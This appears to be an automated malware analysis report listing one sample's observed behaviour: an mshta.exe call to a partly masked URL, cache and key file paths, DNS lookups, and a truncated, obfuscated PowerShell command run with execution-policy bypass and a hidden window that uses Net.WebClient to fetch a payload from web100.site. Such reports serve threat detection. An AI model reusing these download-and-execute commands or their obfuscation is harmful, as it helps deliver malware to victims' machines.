Technical Information
- '<SYSTEM32>\mshta.exe' http://we##01.site/ID-52849-23
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'https://web100.site/putor/pCVKyxxPoTiucov';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.InvokeComman...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\e9c861d258c35e34386a1d71cd2dda8e_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://we##01.site/ID-52849-23
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- DNS ASK we##01.site
- DNS ASK we##00.site
- DNS ASK we##link.ml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -c "SV P72 'https://web100.site/putor/pCVKyxxPoTiucov';SI Variable:\1J6 'Net.WebClient';ls pena*;SV h (&(Variable *cut*t).Value.InvokeCommand.(((Variable *cut*t).Value.InvokeComman...' (with hidden window)